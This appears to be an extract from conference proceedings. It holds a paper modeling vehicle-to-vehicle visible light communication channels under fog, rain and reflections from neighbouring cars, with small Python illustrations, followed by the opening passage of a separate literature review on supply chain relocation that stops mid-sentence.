According to the Global status report on road safety 2018 issued by the World Health Organization, 'deaths from road traffic crashes have increased to 1.35 million a year'; that is, nearly 3700 people are killed on the world's roads every day [1]. A promising way to address this problem is intelligent transport systems (ITS), which can significantly improve road safety and transportation, provide additional capabilities for enhancing traffic flow, and address environmental concerns by monitoring driving behavior. Beyond safety, communication systems can share data between cars and the road infrastructure in real time, alerting drivers and providing information for safe driving [2]; the overall performance of transportation systems can thus be greatly improved. Wireless vehicular communication systems, also known as 'connected vehicles' [3], are a new type of network. Modern vehicles are equipped with numerous electronic sensors for monitoring speed, position, heading, and so on, and establishing V2V communication to share this information wirelessly is very attractive for enhancing not only safety but also comfort. In recent years, research on vehicular communications has greatly expanded because it promises to facilitate the deployment of the Internet of Vehicles [4]. Driven by the overall demand for wireless communication, visible light communication opens up an entirely new domain of possibilities to complement existing forms of wireless communication [5]. Furthermore, VLC has a relatively brief history compared to radio communication technology: it was standardized only in 2011 [6]. VLC provides several advantages, such as an enormous and unregulated bandwidth, no interference with RF systems, no health hazard, low power consumption, and better security at the physical layer [5]. Its use has primarily been considered for indoor applications. However, its application to outdoor ITS is a natural solution for vehicle networking, strongly favored by the wide deployment of LED lighting sources such as traffic lights, headlamps, and turn-indicator signals. Thus, based on its highly appealing features and its dual functionality as a source of lighting and communication, VLC is poised to become a major enabler for ITS [7]. In this regard, numerous studies have shown that VLC can meet the demands of vehicle networks under real working conditions [8, 9].

1.1 Related Works

As in the development of any wireless system, channel modeling is critical for the design and evaluation of vehicular VLC performance [10]. As mentioned above, VVLC is still at an early stage because of the challenges it faces: it requires a LOS link, which might not always be available in outdoor scenarios (e.g., due to mobility), and meteorological phenomena such as fog, rain, snow, and other airborne particles degrade the transmitted signal through both absorption and scattering of the light waves [10]. The different modeling approaches for V2V channels can be classified into three categories: stochastic models, deterministic models, and geometry-based stochastic models (GBSMs) [11]. Comprehensive and detailed reviews of existing vehicular communication channel models can be found in [11–13]. We briefly review the related works most closely relevant to our study. In [14], the authors used a geometry-based model of road-surface reflection that considers LOS and NLOS components; this model ignored all other reflections, e.g., from surrounding vehicles, as well as atmospheric effects. Similarly, in [15] the authors proposed a vehicular communication system model based on outdoor MIMO-VLC and used a new modular method to improve system performance; however, this method does not take into account the impact of background light and weather conditions on the channel model. There is therefore a need to study channel modeling for outdoor applications under atmospheric conditions such as fog and rain, as well as their dynamic aspects. Some works exist in this context, such as [16], which simulated the attenuation introduced by rain and snow on V2I (vehicle-to-infrastructure) VLC.


In [17–19], the authors use a ray-tracing-based method to model the channel, which falls into the deterministic channel-modeling approaches. Such models require a detailed and time-consuming description of the propagation environment, making them difficult to apply to a broader range of scenarios [11]. Alternatively, other works use geometry-based stochastic channel modeling, which is less complex and easier to generalize. For example, [20] proposed a GBSM for the vehicular channel that already considers light reflected from surrounding moving vehicles and from stationary roadside objects. However, that model may not describe VVLC appropriately because of the directional radiation and reflection of light: unlike RF waves, which propagate in all directions, light waves propagate only in straight lines [10]. Similarly, a GBDM has been proposed for mobile indoor VLC channels in [21]. Most recently, the authors in [22] proposed a regular-shaped GBSM with an elliptic form to characterize the VLC channel, but weather conditions and road reflection, for example, were ignored in that work. According to the literature, many challenges thus remain unaddressed in VVLC channel modeling. In this work, we propose a geometrical model that does not impose any particular shape, in line with the directional emission of the light source. This choice is justified by its flexibility in describing VVLC channels [12], especially the locations and speeds of the vehicles and the stationary and non-stationary reflectors that change dynamically. The remainder of this paper is structured as follows: Sect. 2 presents the system model as well as our channel-modeling approach; Sect. 3 presents and discusses the simulation results; finally, the conclusion summarizes the outcomes of this work.

2 System Model

Visible light communication systems typically consist of two main components: a VLC emitter and a VLC receiver separated by the VLC channel. In the V2V scenario, the LED headlamps act as transmitters that send the necessary information (e.g., user data and positioning information) via visible light, while photodetectors (photodiodes in this study) or imaging sensors (e.g., cameras) play the role of receivers. Data transmission is considered a secondary function, complementary to the main lighting and/or signaling function; it must not affect the basic lighting or signaling function in any way [26]. For this reason, the VLC emitter must use the same optical power or, if the application requires it, allow for light dimming [26]. A central element of the VLC transmitter is the encoder, which converts the data into a modulated message: it controls the switching of the LEDs according to the binary information and the required data rate, so the binary data is converted into a modulated light beam. The visible light pulses originating at the emitter are collected by a photodetector, which is characterized by its field of view (FOV), responsivity, and active area.
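As a toy illustration of the encoder's role, the Python sketch below maps a bit string onto a two-level (on-off keying) intensity waveform; the modulation format, sample rate, and intensity levels are our own assumptions for illustration, not parameters taken from the paper.

```python
import numpy as np

def ook_waveform(bits: str, samples_per_bit: int = 8,
                 p_on: float = 1.0, p_off: float = 0.1) -> np.ndarray:
    """Map each bit to a constant optical intensity level (OOK).

    p_off is kept above zero so the headlamp never switches fully off,
    preserving the lighting function while data is transmitted.
    """
    levels = [p_on if b == "1" else p_off for b in bits]
    return np.repeat(np.array(levels), samples_per_bit)

tx_intensity = ook_waveform("1011001")
print(tx_intensity)
```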


Figure 1 shows the communication block diagram of the V2V VLC model studied here: Data → Source coding → Channel coding → Modulation → Tx (LED headlamp) → V2V VLC channel → Rx (PD sensor on the tail) → Demodulation → Channel decoding → Source decoding → Data.

Fig. 1. VVLC communication system block diagram.

The VLC channel is modeled by means of the typical path-loss additive white Gaussian noise (AWGN) channel model [23] (Fig. 2). In this model, the output current Y(t) produced by the photodiode (PD) is linked to the transmitted optical power X(t) by:

$$Y(t) = X(t) \otimes h(t) + N(t) \qquad (1)$$

Fig. 2. Communication system block diagram (X(t) → h(t) → + N(t) → Y(t)).

where ⊗ denotes the convolution operation and h(t) is the channel impulse response (CIR) [10], which combines the geometrical propagation path loss and the effect of weather conditions and is expressed by:

$$h(t) = \Re \, h_a \, h_g(t) \qquad (2)$$

where $\Re$ is the photodiode responsivity (A/W), $h_a$ is the atmospheric attenuation, and $h_g$ is the geometrical propagation path loss.

2.1 Atmospheric Attenuation ha

The atmospheric attenuation can be described by the following Beer's-law expression [10]:

$$h_a = \tau(d) = e^{-\gamma d} \qquad (3)$$

where γ is the extinction coefficient per unit length and τ(d) is the transmittance at distance d from the transmitter. Based on [24], the extinction coefficient for clear, rainy, and foggy weather is γ = 1.5 × 10⁻⁵, 0.9 × 10⁻³, and 0.078 m⁻¹, respectively.
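As a quick numerical check of Eq. (3), the following Python snippet evaluates the atmospheric attenuation at a few link distances using the extinction coefficients quoted above (values in m⁻¹; the chosen distances are ours, for illustration).

```python
import math

# Extinction coefficients (per metre) quoted from [24] for each condition.
GAMMA = {"clear": 1.5e-5, "rainy": 0.9e-3, "foggy": 0.078}

def atmospheric_attenuation(gamma: float, d: float) -> float:
    """Beer's law transmittance h_a = exp(-gamma * d), Eq. (3)."""
    return math.exp(-gamma * d)

for d in (10.0, 30.0, 50.0):
    losses = {w: atmospheric_attenuation(g, d) for w, g in GAMMA.items()}
    print(f"d = {d:4.0f} m: " + ", ".join(
        f"{w} {10 * math.log10(h):6.2f} dB" for w, h in losses.items()))
# Fog dominates: about -3.4 dB at 10 m and roughly -17 dB at 50 m,
# while rain and clear air cause only fractions of a dB.
```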


2.2 The Geometrical Propagation Path Loss hg

In this study, we propose a geometrical model to study the dynamic VVLC link, as shown in Fig. 3. The vehicle Tx represents the transmitter, which sends the signal using its headlights, whereas Rx represents the receiver. Vx is a neighboring vehicle that acts as a reflector and is assumed to be Lambertian. We suppose that the transmitter, receiver, and reflector move in the same direction with speeds υTx, υRx, and υVx, respectively.

Fig. 3. Proposed model for VVLC channel

Therefore, the geometrical path gain hg(t) includes a LOS component and a non-LOS (reflected) component:

$$h_g(t) = h_{LOS}(t) + h_{NLOS}(t) \qquad (4)$$

where the DC channel gain of the LOS path for a Lambertian source is given by:

$$h_{LoS}(t) = \frac{(m+1)A_r}{2\pi \left(D_{TR}(t)\right)^2}\, \cos^m(\varphi)\, T_s(\theta)\, g(\theta)\, \cos(\theta)\; \delta\!\left(t - \frac{D_{TR}(t)}{c}\right) \qquad (5)$$

where $A_r$ is the active area of the optical receiver, $D_{TR}(t)$ is the time-varying distance between Tx and Rx, $\varphi$ is the irradiance angle, $\theta$ is the incidence angle, and $\delta\!\left(t - \frac{D_{TR}(t)}{c}\right)$ accounts for the propagation delay of the signal. $T_s(\theta)$ is the gain of an optical filter used to block out-of-band natural and artificial light; using a lens together with an optical filter effectively enhances the detectivity of the PD and reduces undesired ambient light. $g(\theta)$ is the concentrator gain, given by:

$$g(\theta) = \begin{cases} \dfrac{n^2}{\sin^2(\theta)}, & 0 \le \theta \le FOV \\ 0, & \theta > FOV \end{cases} \qquad (6)$$

in which $n$ is the refractive index of the lens of the PD, and $m$ is the Lambertian emission order specifying the directivity of the transmitter, obtained from $m = -\dfrac{\ln(2)}{\ln\!\left(\cos(\varphi_{1/2})\right)}$, where $\varphi_{1/2}$ is the half-power angle of the radiation.


In our model, the vehicles move in a stable lineup with negligible lateral angular deviation, so it is valid to take $\varphi = \theta = 0$. The DC channel gain $H_{LoS}(0)$ can then be rewritten as:

$$H_{LoS}(0) = \frac{(m+1)A_r}{2\pi \left(D_{TR}(t)\right)^2} \qquad (7)$$
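The sketch below evaluates the LOS DC gain of Eqs. (5)–(7) in Python. The receiver parameters follow Table 1; the half-power angle of the headlamp is not listed in the paper, so the value used here (30°) is an assumption for illustration only.

```python
import math

A_R = 1e-4          # active receiver area: 1 cm^2 (Table 1)
T_S = 1.0           # optical filter gain (Table 1)
G_CONC = 1.0        # concentrator gain (Table 1)
PHI_HALF = math.radians(30.0)   # assumed half-power angle of the headlamp

def lambertian_order(phi_half: float) -> float:
    # m = -ln(2) / ln(cos(phi_1/2))
    return -math.log(2.0) / math.log(math.cos(phi_half))

def h_los_dc(d: float, phi: float = 0.0, theta: float = 0.0) -> float:
    """DC gain of the LOS path, Eq. (5); phi = theta = 0 gives Eq. (7)."""
    m = lambertian_order(PHI_HALF)
    return ((m + 1) * A_R / (2 * math.pi * d ** 2)
            * math.cos(phi) ** m * T_S * G_CONC * math.cos(theta))

for d in (10.0, 30.0, 70.0):
    print(f"D_TR = {d:4.0f} m -> H_LoS(0) = {h_los_dc(d):.3e}")
```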

Similarly, the reflection from the vehicle reflector is given by:

$$h_{NLoS}(t) = \sum_{i=1}^{N} \frac{(m+1)}{2\pi \left(d^{\,i}_{Tx\text{-}Vx}\right)^2}\, \cos^m\!\left(\varphi^{\,i}_{Tx}\right)\cos\!\left(\theta^{\,i}_{Vx}\right) \times \frac{(m+1)A_r\,\rho_v}{2\pi \left(d^{\,i}_{Vx\text{-}Rx}\right)^2}\, \cos^m\!\left(\varphi^{\,i}_{Vx}\right)\cos\!\left(\theta^{\,i}_{Rx}\right) \times \delta\!\left(t - \frac{d_{Tx\text{-}Vx} + d_{Vx\text{-}Rx}}{c}\right) \qquad (8)$$

where $N$ is the number of reflectors and $\rho_v$ denotes the reflection coefficient of the vehicle's body. $d_{Tx\text{-}Vx}$ and $d_{Vx\text{-}Rx}$ are, respectively, the distance between transmitter and reflector and between reflector and receiver. $\varphi_{Tx}$ and $\varphi_{Vx}$ are the angles of departure (AoD) of the waves emitted from the optical source and from the reflector, while $\theta_{Vx}$ and $\theta_{Rx}$ are the angles of arrival (AoA) of the waves reaching the reflector and the receiver, respectively. Based on the trigonometric relations of Fig. 3, the distances and angles can be written as:

$$d_{Tx\text{-}Vx} = \sqrt{a^2 + H^2}; \quad d_{Vx\text{-}Rx} = \sqrt{b^2 + H^2}; \quad \varphi^{Vx}_{Tx} = \cos^{-1}\!\left(\frac{a}{d_{Tx\text{-}Vx}}\right); \quad \varphi^{Rx}_{Vx} = \tan^{-1}\!\left(\frac{b}{H}\right); \quad \theta^{Tx}_{Vx} = \tan^{-1}\!\left(\frac{a}{H}\right); \quad \theta^{Vx}_{Rx} = \tan^{-1}\!\left(\frac{H}{b}\right) \qquad (9)$$
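To illustrate the geometry of Eq. (9), this small Python helper computes the two hop distances and the extra propagation delay of the reflected path relative to the direct one; the numerical values of a, b, and H are ours, chosen only as an example.

```python
import math

C = 3.0e8  # speed of light (m/s)

def reflection_geometry(a: float, b: float, H: float, d_tr: float):
    """Distances of the Tx->Vx->Rx path (Eq. (9)) and its excess delay."""
    d_tx_vx = math.hypot(a, H)          # sqrt(a^2 + H^2)
    d_vx_rx = math.hypot(b, H)          # sqrt(b^2 + H^2)
    excess_delay = (d_tx_vx + d_vx_rx - d_tr) / C
    return d_tx_vx, d_vx_rx, excess_delay

# Example: reflector 20 m ahead of Tx and 50 m behind Rx, lateral offset 3.5 m;
# Tx and Rx are assumed to share a lane, so D_TR is roughly a + b = 70 m.
d1, d2, dt = reflection_geometry(a=20.0, b=50.0, H=3.5, d_tr=70.0)
print(f"d_Tx-Vx = {d1:.2f} m, d_Vx-Rx = {d2:.2f} m, "
      f"excess delay = {dt * 1e9:.2f} ns")
```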

3 Simulation Results and Analysis

For the simulations, the environment parameters are summarized as follows: the transmission power is 1 mW and the reflection coefficient is ρv = 0.8 (Table 1). We assume that the transmitter and receiver vehicles move in the same direction at different speeds, υTx = 6 m/s and υRx = 4 m/s, corresponding to 21.6 km/h and 14.4 km/h, respectively; these speeds were chosen according to urban speed limits [20]. The positions and number of reflectors are assumed to be random and to change continuously over time with the distances. The initial distance between transmitter and receiver is set to 70 m in the first case study. Figure 4 shows the CIR of the LOS and NLOS components when the transmitter and receiver move in the same direction at different velocities. The received power of the LOS component is about five orders of magnitude greater than that of the reflection component. This gap is explained by the fact that the relative speed of the vehicles affects the received power of the reflection component more than that of the LOS component, in line with the results in [22].

Table 1. Simulation Parameters

Symbol | Description | Value
FOV | Receiver field of view | 70°
g(θ) | Gain of the concentrator | 1.0
Ar | Active area of the receiver | 1 cm²
T(θ) | Optical filter's transmission coefficient | 1.0
ρv | Vehicle reflectivity | 0.8 [25]

Fig. 4. CIR: a) LOS component and b) NLOS component.

In Fig. 5, we present the received power under clear, foggy, and rainy weather conditions for a visibility of V = 50 m (in this case, the initial distance between transmitter and receiver is set to 10 m). The results show that, in general, the received power decreases as the distance increases, which is the intuitive behavior. Regarding the weather, the received power is most affected by fog, which introduces significant degradation, while rain has a negligible effect on the VLC link. In these conditions, the weather reduces the received power to −61.51 dBm and −78.25 dBm for rain and fog, respectively.
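The trend in Fig. 5 can be reproduced approximately by combining the LOS gain of Eq. (7) with the atmospheric attenuation of Eq. (3), as in the Python sketch below; the 1 mW transmit power and the extinction coefficients come from the paper, while the 30° half-power angle is again our own assumption, so the absolute dBm values are only indicative.

```python
import math

P_TX = 1e-3                      # transmit power: 1 mW
A_R = 1e-4                       # 1 cm^2 active area (Table 1)
PHI_HALF = math.radians(30.0)    # assumed headlamp half-power angle
GAMMA = {"clear": 1.5e-5, "rainy": 0.9e-3, "foggy": 0.078}  # per metre

M = -math.log(2.0) / math.log(math.cos(PHI_HALF))  # Lambertian order

def received_power_dbm(d: float, gamma: float) -> float:
    h_los = (M + 1) * A_R / (2 * math.pi * d ** 2)   # Eq. (7)
    h_a = math.exp(-gamma * d)                        # Eq. (3)
    p_rx = P_TX * h_los * h_a
    return 10 * math.log10(p_rx / 1e-3)

for d in (10, 20, 30, 40, 50):
    row = ", ".join(f"{w}: {received_power_dbm(d, g):6.1f} dBm"
                    for w, g in GAMMA.items())
    print(f"d = {d:2d} m -> {row}")
```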


Fig. 5. Received optical power Pr (dBm) versus distance (m), from 10 m to 50 m, for: (a) clear weather, (b) rainy weather, (c) foggy weather.

4 Conclusion

Efficient channel models are required to simulate the propagation channel effectively, and the VVLC channel in particular still needs substantial research effort since it is at an early stage. It is crucial to consider channel conditions representative of a real environment in order to develop a comprehensive system model. This work contributes in this regard: we rely on a geometrical model to characterize the impact of NLOS reflections and weather conditions under dynamic behavior. According to the simulation results, the reflections from surrounding cars contribute to V2V VLC propagation but do not noticeably affect performance, whereas fog degrades the link much more than rain or clear weather. In future work, we aim to improve our model by considering other disruptions and challenges of a realistic channel.

References

1. World Health Organization: Global status report on road safety 2018 (2018)
2. Cailean, A.-M., Cagneau, B., Chassagne, L., Popa, V., Dimian, M.: A survey on the usage of DSRC and VLC in communication-based vehicle safety applications. In: Proceedings of the 2014 IEEE 21st Symposium on Communications and Vehicular Technology (SCVT) in the Benelux, pp. 69–74, November 2014
3. Uhlemann, E.: Introducing connected vehicles [connected vehicles]. IEEE Veh. Technol. Mag. 10(1), 23–31 (2015)
4. Ji, B., et al.: Survey on the internet of vehicles: network architectures and applications. IEEE Commun. Stand. Mag. 4(1), 34–41 (2020)
5. Jovicic, A., Li, J., Richardson, T.: Visible light communication: opportunities, challenges and the path to market. IEEE Commun. Mag. 51(12), 26–32 (2013)
6. IEEE: 802.15.7 Standard for local and metropolitan area networks. Part 15.7: Short-range wireless optical communication using visible light (2011). https://standards.ieee.org/standard/802_15_7-2011.html (accessed June 19, 2020)


7. Pathak, P.H., Feng, X., Hu, P., Mohapatra, P.: Visible light communication, networking, and sensing: a survey, potential and challenges. IEEE Commun. Surv. Tutor. 17(4), 2047–2077 (2015)
8. Enabling vehicular visible light communication (V2LC) networks. In: Proceedings of the Eighth ACM International Workshop on Vehicular Inter-networking. https://doi.org/10.1145/2030698.2030705 (accessed June 18, 2020)
9. Akanegawa, M., Tanaka, Y., Nakagawa, M.: Basic study on traffic information system using LED traffic lights. IEEE Trans. Intell. Transp. Syst. 2(4), 197–203 (2001)
10. Ghassemlooy, Z., Popoola, W., Rajbhandari, S.: Optical Wireless Communications: System and Channel Modelling with MATLAB®. CRC Press, Boca Raton (2017)
11. Al-Kinani, A., Wang, C.-X., Zhou, L., Zhang, W.: Optical wireless communication channel measurements and models. IEEE Commun. Surv. Tutor. 20(3), 1939–1962 (2018)
12. Wang, C.-X., Bian, J., Sun, J., Zhang, W., Zhang, M.: A survey of 5G channel measurements and models. IEEE Commun. Surv. Tutor. 20(4), 3142–3168 (2018)
13. Wang, C., Cheng, X., Laurenson, D.I.: Vehicle-to-vehicle channel modeling and measurements: recent advances and future challenges. IEEE Commun. Mag. 47(11), 96–103 (2009)
14. Luo, P., Ghassemlooy, Z., Minh, H.L., Bentley, E., Burton, A., Tang, X.: Performance analysis of a car-to-car visible light communication system. Appl. Opt. 54(7), 1696 (2015)
15. Farahneh, H., Khalifeh, A., Fernando, X.: An outdoor multi path channel model for vehicular visible light communication systems. In: Proceedings of the 2016 Photonics North (PN), Quebec City, QC, Canada, p. 1, May 2016
16. Zaki, R.W., Fayed, H.A., Abd El Aziz, A., Aly, M.H.: Outdoor visible light communication in intelligent transportation systems: impact of snow and rain. Appl. Sci. 9(24), 5453 (2019)
17. Eldeeb, H.B., Miramirkhani, F., Uysal, M.: A path loss model for vehicle-to-vehicle visible light communications. In: Proceedings of the 2019 15th International Conference on Telecommunications (ConTEL), Graz, Austria, pp. 1–5, July 2019
18. Miramirkhani, F., Uysal, M.: Channel modeling and characterization for visible light communications. IEEE Photonics J. 7(6), 1–16 (2015)
19. Lee, S.J., Kwon, J.K., Jung, S.Y., Kwon, Y.H.: Simulation modeling of visible light communication channel for automotive applications. In: Proceedings of the 2012 15th International IEEE Conference on Intelligent Transportation Systems, pp. 463–468, September 2012
20. Al-Kinani, A., Sun, J., Wang, C.-X., Zhang, W., Ge, X., Haas, H.: A 2-D non-stationary GBSM for vehicular visible light communication channels. IEEE Trans. Wirel. Commun. 17(12), 7981–7992 (2018)
21. Al-Kinani, A., Wang, C.-X., Haas, H., Yang, Y.: A geometry-based multiple bounce model for visible light communication channels. In: Proceedings of the 2016 International Wireless Communications and Mobile Computing Conference (IWCMC), pp. 31–37, September 2016
22. Alsalami, F.M., Ahmad, Z., Haas, O., Rajbhandari, S.: Regular-shaped geometry-based stochastic model for vehicle-to-vehicle visible light communication channel. In: Proceedings of the 2019 IEEE Jordan International Joint Conference on Electrical Engineering and Information Technology (JEEIT), pp. 297–301, April 2019
23. Kahn, J.M., Barry, J.R.: Wireless infrared communications. Proc. IEEE 85(2), 265–298 (1997)
24. Willebrand, H.: Free-space optics: enabling optical connectivity in today's networks, p. 278
25. Fabian, M., Lewis, E., Newe, T., Lochmann, S.: Optical fibre cavity for ring-down experiments with low coupling losses. Meas. Sci. Technol. 21, 1–5 (2010)
26. Cailean, A., Dimian, M.: Impact of IEEE 802.15.7 standard on visible light communications usage in automotive applications. IEEE Commun. Mag. 55(4), 169–175 (2017)

Mapping Review of Research on Supply Chains Relocation

Mouna Benfssahi1(B), Nordine Sadki1, Zoubir El Felsoufi1, and Abdelhay Haddach2

1 Laboratory of Mathematical Modeling and Control, Faculty of Science and Techniques, Tangier, Morocco
{M.benfssahi,Zelfelsoufi}@uae.ac.ma, [email protected]
2 Materials, Environment and Sustainable Development, Faculty of Science and Techniques, Tangier, Morocco

Abstract. Supply chain relocation (SCR) and reconfiguration are emerging disciplines that allow supply chains to reduce costs and improve operational and economic performance. In this article, we provide a mapping review of the literature related to supply chain relocation, which is part of supply chain design. We first make a broad sweep of the literature to build an understanding of existing supply chain relocation models and of the criteria, characteristics, and constraints they take into consideration. We explore 20 years of models related to SCR, from 2001 to 2020, and summarize their characteristics and factors as well as the main authors. Furthermore, we highlight the reasons why it is necessary to include financial policies in SCR models. The review methodology is general, can be applied to any field, and aims to help researchers find fruitful works related to their own field.

Keywords: Supply chain relocation · Mapping review · International financial policies

1 Introduction

A typical supply chain is a network of materials and information composed of suppliers, manufacturers, logistics agencies, distribution centers (or warehouses), retailers, and consumers. It involves the whole process and all the entities that lead to a product, from raw material sourcing, production of intermediate products, assembly of finished products, packaging, warehousing, and transportation to the end customer, up to its disposal. Supply chain management (SCM) is the management of the flows of materials, information, and funds across different enterprises and departments. It has proved to be an effective way to enhance enterprises' flexibility and sustainability in the current globalized market through collaboration with upstream and downstream enterprises.


Supply chain management has since emerged as a science needed to create value and ensure the competitiveness of companies, and several notions and concepts have appeared to enrich the vocabulary of SCM. In the following, we present some business movements and how they differ from the concept of relocation. Managing supply chains through facility relocation, as confirmed by Melo et al. [44], is becoming increasingly important. This tendency manifests itself in transferring part of the supply chain to less developed sites that produce intermediate goods, while the finished product is assembled at a site close to the final customer. From there, the concept of relocation has emerged as a business movement covering operations that remain inside the group but are carried out abroad by its own subsidiaries [51]; in such a case, new flows are created to exchange goods and services between the parent company and its subsidiaries abroad. The importance of supply chain relocation models is considerable. Still, to the best of the authors' knowledge, the literature fails to establish the link between relocation and the use of financial criteria, which can help improve supply chain performance. Our first contribution in this article is to sort out research on supply chain relocation connected with the analysis of international financial factors. Our second contribution is to define some financial policies and show their impact on supply chain performance and relocation decisions. Thirdly, our review methodology can be reused in many fields to extract fruitful works. The remainder of this article is organized as follows: we first review the existing definitions of relocation and similar strategies in the literature; secondly, we conduct a mapping review of 20 years of research, according to several metrics, to build an understanding of supply chain relocation models; thirdly, we summarize the models' characteristics and analyze their gaps. We find that transfer-pricing criteria are seldom discussed in relocation models, and we present an illustrative example to highlight the impact of transfer-price policies on firms' economic performance and on the relocation decision.

2 Different Business Strategies Related to SCM

Across the literature, a few works such as [7,29,33,55,69] refer to the relocation phenomenon as "delocalization", a term of French origin. However, "relocation" is the most common name in the literature, and it is used during our analysis of the research databases so as not to miss relevant works in the field. The relocation strategy is distinguished from other business strategies because they have different characteristics and motivations: firms must decide not only where to locate their activities but also whether to keep control and autonomy or delegate them to external parties. Such decisions are named outsourcing, offshoring, insourcing, reshoring, and back-shoring, which are business strategies that affect the organizational structure of a firm. The distinct definitions found in the literature are summarized below in Table 1.


Table 1. Comparison of different business strategies.

Business phenomenon | Strategy | Motivations and ownership
Relocation (Eng. term) or Delocalization (Fr. term) or Offshoring | Internalization | Essentially reducing costs; not motivated by conquering new markets; owned subsidiary out of the country
Outsourcing | Externalization | Essentially reducing costs and increasing competitiveness; transfer of ownership and control to a third party (domestic or foreign)
FDI | Internalization | Essentially conquering new markets; owned by the home country
Insourcing | Internalization | Relocation to an owned foreign company in order to take back control
Reshoring | Internalization | Generic change of location with respect to a previous offshore country; can include further offshoring (i.e., relocation to another offshore location) or back-shoring
Back-shoring | Internalization | Relocation back to the firm's home country of origin in order to enhance quality, brand sensitivity to the "made in" label, and customer added value

We think that the divergences regarding the definition of relocation come from the adoption of different points of view, different motivations, and different ownership structures. Since we adopt the firm's point of view and focus on supply chain aspects, it is more appropriate to define relocation at a micro-economic level while emphasizing the elements that impact the configuration of supply chains. Outsourcing is the delegation of a non-competitive part of production or services to an external party in order to minimize costs and benefit from the expertise of specialized firms. The goal is to delegate secondary activities that are time- and cost-consuming, or that the company does not master well, so that the company can dedicate more of its resources to the leading competitive activities that constitute its core business. The company may choose to outsource in the home country (domestic outsourcing) or in a foreign country (foreign outsourcing). Farok et al. (2010) [21] define outsourcing as the organizational restructuring of some activities, either in the firm's home nation or abroad, toward external providers. They consider offshoring, in contrast, as restructuring the firm geographically from the home nation to a foreign location where the same activities are performed either by the company's own subsidiary or by a foreign contract vendor. [42] define offshoring as "the transfer of business processes and activities to foreign locations", while stating that outsourcing "refers to services that are sourced from an external supplier within the boundaries of one country". According to Hammami [33], relocation is defined as the total or partial transfer, through FDI, of a productive process whose output is initially destined for the same current markets, in order to increase the firm's added value. Arlbjorn and Mikkelsen [3] distinguish these concepts from an ownership perspective: they link offshoring to an owned subsidiary outside the country and outsourcing to the transfer of ownership and control to a third party, and they consider insourcing and back-shoring as relocating production to a facility in another country owned by the company. Johansson and Olhager [38] state that 'offshoring' refers to the relocation of a firm's activities across its national borders, while 'back-shoring' indicates a relocation back to the firm's home country of origin; 'reshoring', which refers to a generic change of location with respect to a previous offshore country, can include further offshoring (i.e., relocation to another offshore location) or back-shoring (i.e., relocation to the home country). FDI can be confused with relocation, but the main difference lies in the motive: FDI seeks new markets, whereas relocation does not and is mostly driven by cost-reduction incentives. FDI is suitable when a country has signed several international trade agreements with other countries, since the exporting company can then sell its products to all the countries having agreements with the host country. For example, an exporting company installed in Morocco can sell from Morocco to the Gulf, American, or African countries.

3 Definition of Relocation in Literature

The relocation of supply chains, occasionally also called delocalization (from French), is referred to as offshore in-house sourcing in the sense of relocation abroad. According to the Organisation for Economic Co-operation and Development (OECD), relocation in the strict sense is defined as production within the group to which the company belongs, but carried out abroad by its own subsidiaries [52]. According to the same reference, a relocation that takes place through subsidiaries of the same group must satisfy the following characteristics:

– Total or partial closure of the company's production units in the reporting country, with a reduced workforce.
– Opening of subsidiaries (or production units) abroad that produce the same goods and services; existing subsidiaries could also carry out this production.
– In the reporting country, the relocated firm imports goods and services from its own subsidiaries abroad that were previously consumed within that country, while exports may decrease, as they would be partially or totally made from abroad and destined for the same markets as the reporting country's exports.


As described in Fig. 1, once relocated, the group will consist of a parent company and another subsidiary located abroad, both trading goods and services. The values of these exchanged goods are measured in terms of transfer pricing.

Fig. 1. Illustration of the material flow of a relocated Firm.

3.1 Existing Definitions of Relocation

We can understand intuitively that the term relocation (or, less frequently, delocalization) means the transfer of production activities from a national territory to a foreign one. Nowhere in the literature have we found a standard definition. We present in Table 2 some of the most interesting definitions according to our reading.

3.2 Types of Relocation

Horizontal Relocation. It is carried out from one developed country to another, a North-North relocation, and takes place mainly in the most developed economic zones, which attract a very high proportion of total FDI. It mostly happens through company takeovers and mergers and acquisitions. The main purpose of this movement is to maintain the company's market share while benefiting from several advantages: overcoming tariff barriers such as customs duties imposed on goods, reducing transport costs, adapting products to local consumer preferences, and improving services thanks to proximity to the customer. Whatever the reason for the relocation, it does not imply a change in the activity of the company of origin; on the contrary, it strengthens this activity and even keeps it alive.

Table 2. Most relevant definitions of supply chain relocation in the literature.

[28] – In its strictest sense, relocation refers to changing the location of a given production unit without affecting the destination of the manufactured products. – In a second sense, relocation refers to internationally outsourcing some activities that were previously carried out in the national unit. – Finally, one may define relocation as the creation of a new production unit in a foreign country, even if domestic activities have not been reduced.
[5] The relocation consists of all decisions unfavorable to the location of activities and employment in the national territory.
[8] Relocation is defined as the substitution of national production by foreign production, resulting from the decision of a producer to give up production in the country of origin in order to manufacture or outsource its products in a foreign territory.
[52] Relocation is production within the group the company belongs to, but carried out abroad by its own subsidiaries.
[33] Relocation commonly refers to transferring certain production activities from developed to developing countries, essentially to benefit from low labor costs.
[21] Relocation is restructuring the firm geographically from the home nation to a foreign location where the same company activities are performed under the company's own subsidiary.
[42] Relocation is "the transfer of business processes and activities to foreign locations" while keeping an internalization strategy.
[3] Relocation is an owned subsidiary out of the country.
[38] 'Supply chain relocation' refers to the relocation of a firm's activities across its national borders.

Vertical Relocation. "It occurs between two countries if they have sufficiently large differences in factor endowments or production costs" [48]. This operation is carried out through FDI or by recourse to international subcontracting, and the relocation movement goes from North to South. Unlike horizontal relocation, vertical relocation concerns the production of "pieces" of the same product and is linked to the theory of the international decomposition of the production process (DIPP). We can therefore deduce that international specialization and countries' comparative advantages are not limited to final products but also affect the segments of production involved in producing those final products. This strategy has led to the organization of firms into network firms. Vertical relocation can also be a substitution, i.e., the relocated production replaces the production previously carried out in the country of origin. This form of offshoring is usually accompanied by the closure of facilities in the home country (or a reduction of production volume) and the re-import of the production relocated abroad.

4 Motivations Behind Relocation Across Literature

Since the early 1990s, Supply Chain Relocation (SCR) – namely, the location of firms' activities in foreign countries irrespective of the governance mode adopted (i.e., make/captive, hybrid/collaborative, buy/outsourcing) [10,36] – has emerged as one of the most widespread strategies implemented by Western manufacturing companies in order to maintain or foster their competitive advantage [21]. With respect to strategic goals, relocation is mainly driven by "cost efficiency" motivations. While this finding is certainly common to many low-technology, labor-intensive industries, its interest lies in the fact that the originating companies never relocate their very-top-end products, which are expected to be more sensitive to the "made in" effect. For instance, Fitwell, in Italy, never offshored its high-tech mountain boots, sold under its own brand name, for which the "made in" effect is felt more strongly by customers. In a similar vein, Roncato offshored its polycarbonate hard-shell suitcases (medium to high range) but not its polypropylene hard-shell suitcases, which are more high-tech and top of the range [1]. A list of papers dealing with motivations for manufacturing relocation and offshoring was identified through a keyword search in Elsevier's Scopus, leading to the identification of 24 offshoring motivations (see Fig. 